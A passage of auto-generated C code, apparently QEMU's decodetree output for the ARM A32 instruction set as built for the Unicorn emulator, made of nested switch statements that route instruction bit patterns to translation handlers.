return false; case 0x1: /* ....0001 0100.... ........ 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:174 */ if (trans_SMLALTB(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x6: /* ....0001 0.00.... ........ 1100.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0000.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:165 */ if (trans_SMLABT(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0100.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:173 */ if (trans_SMLALBT(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x7: /* ....0001 0.00.... ........ 1110.... 
*/ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0000.... ........ 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:167 */ if (trans_SMLATT(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0100.... ........ 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:175 */ if (trans_SMLALTT(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; case 0x1: /* ....0001 0.01.... ........ ...0.... */ disas_a32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); switch (insn & 0x0040f000) { case 0x00000000: /* ....0001 0001.... 0000.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:68 */ if (trans_TST_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00400000: /* ....0001 0101.... 0000.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:70 */ if (trans_CMP_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; } return false; case 0x00200000: /* ....0001 0.1..... ........ ...0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0.10.... ........ ...0.... */ switch ((insn >> 5) & 0x7) { case 0x0: /* ....0001 0.10.... ........ 0000.... */ switch ((insn >> 9) & 0x7f) { case 0x78: /* ....0001 0.10.... 1111000. 0000.... */ disas_a32_extract_disas_a32_Fmt_23(ctx, &u.f_msr_reg, insn); switch ((insn >> 8) & 0x1) { case 0x0: /* ....0001 0.10.... 11110000 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:227 */ if (trans_MSR_reg(ctx, &u.f_msr_reg)) return true; return false; } return false; case 0x79: /* ....0001 0.10.... 1111001. 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:224 */ disas_a32_extract_disas_a32_Fmt_21(ctx, &u.f_msr_bank, insn); if (trans_MSR_bank(ctx, &u.f_msr_bank)) return true; return false; } return false; case 0x1: /* ....0001 0.10.... ........ 0010.... */ disas_a32_extract_rm(ctx, &u.f_r, insn); switch (insn & 0x004fff00) { case 0x000fff00: /* ....0001 00101111 11111111 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:230 */ if (trans_BXJ(ctx, &u.f_r)) return true; return false; } return false; case 0x2: /* ....0001 0.10.... ........ 0100.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00400f00) { case 0x00000000: /* ....0001 0010.... ....0000 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:208 */ if (trans_CRC32H(ctx, &u.f_rrr)) return true; return false; case 0x00000200: /* ....0001 0010.... ....0010 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:211 */ if (trans_CRC32CH(ctx, &u.f_rrr)) return true; return false; } return false; case 0x3: /* ....0001 0.10.... ........ 0110.... */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); switch (insn & 0x004fff0f) { case 0x0040000e: /* ....0001 01100000 00000000 01101110 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:235 */ if (trans_ERET(ctx, &u.f_empty)) return true; return false; } return false; case 0x4: /* ....0001 0.10.... ........ 1000.... */ switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0010.... ........ 1000.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:168 */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); if (trans_SMLAWB(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0110.... ........ 1000.... */ disas_a32_extract_rd0mn(ctx, &u.f_rrrr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0110.... 0000.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:176 */ if (trans_SMULBB(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; case 0x5: /* ....0001 0.10.... ........ 1010.... */ disas_a32_extract_rd0mn(ctx, &u.f_rrrr, insn); switch (insn & 0x0040f000) { case 0x00000000: /* ....0001 0010.... 0000.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:169 */ if (trans_SMULWB(ctx, &u.f_rrrr)) return true; return false; case 0x00400000: /* ....0001 0110.... 0000.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:178 */ if (trans_SMULTB(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x6: /* ....0001 0.10.... ........ 1100.... */ switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0010.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:170 */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); if (trans_SMLAWT(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0110.... ........ 1100.... */ disas_a32_extract_rd0mn(ctx, &u.f_rrrr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0110.... 0000.... 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:177 */ if (trans_SMULBT(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; case 0x7: /* ....0001 0.10.... ........ 1110.... */ disas_a32_extract_rd0mn(ctx, &u.f_rrrr, insn); switch (insn & 0x0040f000) { case 0x00000000: /* ....0001 0010.... 0000.... 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:171 */ if (trans_SMULWT(ctx, &u.f_rrrr)) return true; return false; case 0x00400000: /* ....0001 0110.... 0000.... 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:179 */ if (trans_SMULTT(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; case 0x1: /* ....0001 0.11.... ........ ...0.... */ disas_a32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); switch (insn & 0x0040f000) { case 0x00000000: /* ....0001 0011.... 0000.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:69 */ if (trans_TEQ_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00400000: /* ....0001 0111.... 0000.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:71 */ if (trans_CMN_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; } return false; case 0x00800000: /* ....0001 1.0..... ........ ...0.... */ disas_a32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 100..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:72 */ if (trans_ORR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* ....0001 110..... ........ ...0.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:74 */ if (trans_BIC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x00a00000: /* ....0001 1.1..... ........ ...0.... */ disas_a32_extract_s_rxr_shi(ctx, &u.f_s_rrr_shi, insn); switch (insn & 0x004f0000) { case 0x00000000: /* ....0001 101.0000 ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:73 */ if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00400000: /* ....0001 111.0000 ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:75 */ if (trans_MVN_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; } return false; case 0x01000010: /* ....0001 ........ ........ ...1.... */ switch (insn & 0x00400080) { case 0x00000000: /* ....0001 .0...... ........ 0..1.... */ switch (insn & 0x00a00000) { case 0x00000000: /* ....0001 000..... ........ 0..1.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0000.... ........ 0..1.... */ switch ((insn >> 5) & 0x3) { case 0x2: /* ....0001 0000.... ........ 0101.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 8) & 0xf) { case 0x0: /* ....0001 0000.... ....0000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:157 */ if (trans_QADD(ctx, &u.f_rrr)) return true; return false; } return false; case 0x3: /* ....0001 0000.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:237 */ disas_a32_extract_i16(ctx, &u.f_i, insn); if (trans_HLT(ctx, &u.f_i)) return true; return false; } return false; case 0x1: /* ....0001 0001.... ........ 0..1.... */ disas_a32_extract_S_xrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0001.... 0000.... 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:100 */ if (trans_TST_xrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00200000: /* ....0001 001..... ........ 0..1.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0010.... ........ 0..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0001 0010.... ........ 0001.... */ disas_a32_extract_rm(ctx, &u.f_r, insn); switch ((insn >> 8) & 0xfff) { case 0xfff: /* ....0001 00101111 11111111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:229 */ if (trans_BX(ctx, &u.f_r)) return true; return false; } return false; case 0x1: /* ....0001 0010.... ........ 0011.... */ disas_a32_extract_rm(ctx, &u.f_r, insn); switch ((insn >> 8) & 0xfff) { case 0xfff: /* ....0001 00101111 11111111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:231 */ if (trans_BLX_r(ctx, &u.f_r)) return true; return false; } return false; case 0x2: /* ....0001 0010.... ........ 0101.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 8) & 0xf) { case 0x0: /* ....0001 0010.... ....0000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:158 */ if (trans_QSUB(ctx, &u.f_rrr)) return true; return false; } return false; case 0x3: /* ....0001 0010.... ........ 0111.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:238 */ disas_a32_extract_i16(ctx, &u.f_i, insn); if (trans_BKPT(ctx, &u.f_i)) return true; return false; } return false; case 0x1: /* ....0001 0011.... ........ 0..1.... */ disas_a32_extract_S_xrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0011.... 0000.... 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:101 */ if (trans_TEQ_xrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00800000: /* ....0001 100..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:104 */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); if (trans_ORR_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x00a00000: /* ....0001 101..... ........ 0..1.... */ disas_a32_extract_s_rxr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* ....0001 101.0000 ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:105 */ if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00000080: /* ....0001 .0...... ........ 1..1.... */ switch (insn & 0x00100f60) { case 0x00000000: /* ....0001 .0.0.... ....0000 1001.... */ disas_a32_extract_swp(ctx, &u.f_disas_a3226, insn); switch (insn & 0x00a00000) { case 0x00000000: /* ....0001 0000.... ....0000 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:364 */ if (trans_SWP(ctx, &u.f_disas_a3226)) return true; return false; } return false; case 0x00000020: /* ....0001 .0.0.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:250 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_STRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00000040: /* ....0001 .0.0.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:253 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_LDRD_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00000060: /* ....0001 .0.0.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:256 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_STRD_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00000c00: /* ....0001 .0.0.... ....1100 1001.... */ disas_a32_extract_stl(ctx, &u.f_ldrex, insn); switch (insn & 0x00a0f000) { case 0x0080f000: /* ....0001 1000.... 11111100 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:388 */ if (trans_STL(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00000e00: /* ....0001 .0.0.... ....1110 1001.... */ disas_a32_extract_strex(ctx, &u.f_strex, insn); switch (insn & 0x00a00000) { case 0x00800000: /* ....0001 1000.... ....1110 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:383 */ if (trans_STLEX(ctx, &u.f_strex)) return true; return false; case 0x00a00000: /* ....0001 1010.... ....1110 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:384 */ if (trans_STLEXD_a32(ctx, &u.f_strex)) return true; return false; } return false; case 0x00000f00: /* ....0001 .0.0.... 
....1111 1001.... */ disas_a32_extract_strex(ctx, &u.f_strex, insn); switch (insn & 0x00a00000) { case 0x00800000: /* ....0001 1000.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:378 */ if (trans_STREX(ctx, &u.f_strex)) return true; return false; case 0x00a00000: /* ....0001 1010.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:379 */ if (trans_STREXD_a32(ctx, &u.f_strex)) return true; return false; } return false; case 0x00100020: /* ....0001 .0.1.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:259 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_LDRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100040: /* ....0001 .0.1.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:262 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_LDRSB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100060: /* ....0001 .0.1.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:265 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_LDRSH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100c00: /* ....0001 .0.1.... ....1100 1001.... */ disas_a32_extract_ldrex(ctx, &u.f_ldrex, insn); switch (insn & 0x00a0000f) { case 0x0080000f: /* ....0001 1001.... ....1100 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:402 */ if (trans_LDA(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00100e00: /* ....0001 .0.1.... ....1110 1001.... */ disas_a32_extract_ldrex(ctx, &u.f_ldrex, insn); switch (insn & 0x00a0000f) { case 0x0080000f: /* ....0001 1001.... ....1110 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:397 */ if (trans_LDAEX(ctx, &u.f_ldrex)) return true; return false; case 0x00a0000f: /* ....0001 1011.... ....1110 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:398 */ if (trans_LDAEXD_a32(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00100f00: /* ....0001 .0.1.... ....1111 1001.... */ disas_a32_extract_ldrex(ctx, &u.f_ldrex, insn); switch (insn & 0x00a0000f) { case 0x0080000f: /* ....0001 1001.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:392 */ if (trans_LDREX(ctx, &u.f_ldrex)) return true; return false; case 0x00a0000f: /* ....0001 1011.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:393 */ if (trans_LDREXD_a32(ctx, &u.f_ldrex)) return true; return false; } return false; } return false; case 0x00400000: /* ....0001 .1...... ........ 0..1.... */ switch (insn & 0x00a00000) { case 0x00000000: /* ....0001 010..... ........ 0..1.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0100.... ........ 0..1.... */ switch ((insn >> 5) & 0x3) { case 0x2: /* ....0001 0100.... ........ 0101.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 8) & 0xf) { case 0x0: /* ....0001 0100.... ....0000 0101.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:159 */ if (trans_QDADD(ctx, &u.f_rrr)) return true; return false; } return false; case 0x3: /* ....0001 0100.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:239 */ disas_a32_extract_i16(ctx, &u.f_i, insn); if (trans_HVC(ctx, &u.f_i)) return true; return false; } return false; case 0x1: /* ....0001 0101.... ........ 0..1.... */ disas_a32_extract_S_xrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0101.... 0000.... 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:102 */ if (trans_CMP_xrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00200000: /* ....0001 011..... ........ 0..1.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0110.... ........ 0..1.... */ switch (insn & 0x00000f60) { case 0x00000040: /* ....0001 0110.... ....0000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:160 */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); if (trans_QDSUB(ctx, &u.f_rrr)) return true; return false; case 0x00000060: /* ....0001 0110.... ....0000 0111.... */ disas_a32_extract_disas_a32_Fmt_24(ctx, &u.f_i, insn); switch ((insn >> 12) & 0xff) { case 0x0: /* ....0001 01100000 00000000 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:240 */ if (trans_SMC(ctx, &u.f_i)) return true; return false; } return false; case 0x00000f00: /* ....0001 0110.... ....1111 0001.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch ((insn >> 16) & 0xf) { case 0xf: /* ....0001 01101111 ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:233 */ if (trans_CLZ(ctx, &u.f_rr)) return true; return false; } return false; } return false; case 0x1: /* ....0001 0111.... ........ 0..1.... */ disas_a32_extract_S_xrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0111.... 0000.... 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:103 */ if (trans_CMN_xrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00800000: /* ....0001 110..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:106 */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); if (trans_BIC_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x00a00000: /* ....0001 111..... ........ 0..1.... */ disas_a32_extract_s_rxr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* ....0001 111.0000 ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:107 */ if (trans_MVN_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00400080: /* ....0001 .1...... ........ 1..1.... */ switch (insn & 0x00100060) { case 0x00000000: /* ....0001 .1.0.... ........ 1001.... */ switch (insn & 0x00a00f00) { case 0x00000000: /* ....0001 0100.... ....0000 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:365 */ disas_a32_extract_swp(ctx, &u.f_disas_a3226, insn); if (trans_SWPB(ctx, &u.f_disas_a3226)) return true; return false; case 0x00800c00: /* ....0001 1100.... ....1100 1001.... 
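   (the 1001 column in this region holds the legacy SWP/SWPB pair plus
    the v8 load-acquire/store-release and exclusive variants)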
*/ disas_a32_extract_stl(ctx, &u.f_ldrex, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* ....0001 1100.... 11111100 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:389 */ if (trans_STLB(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00800e00: /* ....0001 1100.... ....1110 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:385 */ disas_a32_extract_strex(ctx, &u.f_strex, insn); if (trans_STLEXB(ctx, &u.f_strex)) return true; return false; case 0x00800f00: /* ....0001 1100.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:380 */ disas_a32_extract_strex(ctx, &u.f_strex, insn); if (trans_STREXB(ctx, &u.f_strex)) return true; return false; case 0x00a00c00: /* ....0001 1110.... ....1100 1001.... */ disas_a32_extract_stl(ctx, &u.f_ldrex, insn); switch ((insn >> 12) & 0xf) { case 0xf: /* ....0001 1110.... 11111100 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:390 */ if (trans_STLH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00a00e00: /* ....0001 1110.... ....1110 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:386 */ disas_a32_extract_strex(ctx, &u.f_strex, insn); if (trans_STLEXH(ctx, &u.f_strex)) return true; return false; case 0x00a00f00: /* ....0001 1110.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:381 */ disas_a32_extract_strex(ctx, &u.f_strex, insn); if (trans_STREXH(ctx, &u.f_strex)) return true; return false; } return false; case 0x00000020: /* ....0001 .1.0.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:311 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x00000040: /* ....0001 .1.0.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:314 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRD_ri_a32(ctx, &u.f_ldst_ri)) return true; return false; case 0x00000060: /* ....0001 .1.0.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:317 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_STRD_ri_a32(ctx, &u.f_ldst_ri)) return true; return false; case 0x00100000: /* ....0001 .1.1.... ........ 1001.... */ disas_a32_extract_ldrex(ctx, &u.f_ldrex, insn); switch (insn & 0x00a00f0f) { case 0x00800c0f: /* ....0001 1101.... ....1100 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:403 */ if (trans_LDAB(ctx, &u.f_ldrex)) return true; return false; case 0x00800e0f: /* ....0001 1101.... ....1110 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:399 */ if (trans_LDAEXB(ctx, &u.f_ldrex)) return true; return false; case 0x00800f0f: /* ....0001 1101.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:394 */ if (trans_LDREXB(ctx, &u.f_ldrex)) return true; return false; case 0x00a00c0f: /* ....0001 1111.... 
....1100 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:404 */ if (trans_LDAH(ctx, &u.f_ldrex)) return true; return false; case 0x00a00e0f: /* ....0001 1111.... ....1110 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:400 */ if (trans_LDAEXH(ctx, &u.f_ldrex)) return true; return false; case 0x00a00f0f: /* ....0001 1111.... ....1111 10011111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:395 */ if (trans_LDREXH(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00100020: /* ....0001 .1.1.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:320 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x00100040: /* ....0001 .1.1.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:323 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x00100060: /* ....0001 .1.1.... ........ 1111.... */ /* 